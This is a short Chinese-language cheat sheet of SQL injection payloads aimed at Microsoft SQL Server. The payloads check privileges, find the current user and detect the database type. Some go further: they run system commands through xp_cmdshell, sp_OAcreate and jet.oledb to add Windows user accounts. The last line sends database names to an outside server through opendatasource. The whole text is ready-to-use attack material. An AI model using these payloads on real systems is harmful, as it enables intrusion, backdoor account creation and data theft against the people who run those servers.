//看看是什么權限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//檢測是否有讀取某數據庫的權限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
數字類型 and char(124)%2Buser%2Bchar(124)=0
字符類型 ' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索類型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用戶名 and user>0 ' and user>0 and ''='
檢測是否為SA權限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
檢測是不是MSSQL數據庫 and exists (select * from sysobjects);--
然后利用jet.oledb執行系統命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
執行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
判斷xp_cmdshell擴展存儲過程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
//得到數據庫名 insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
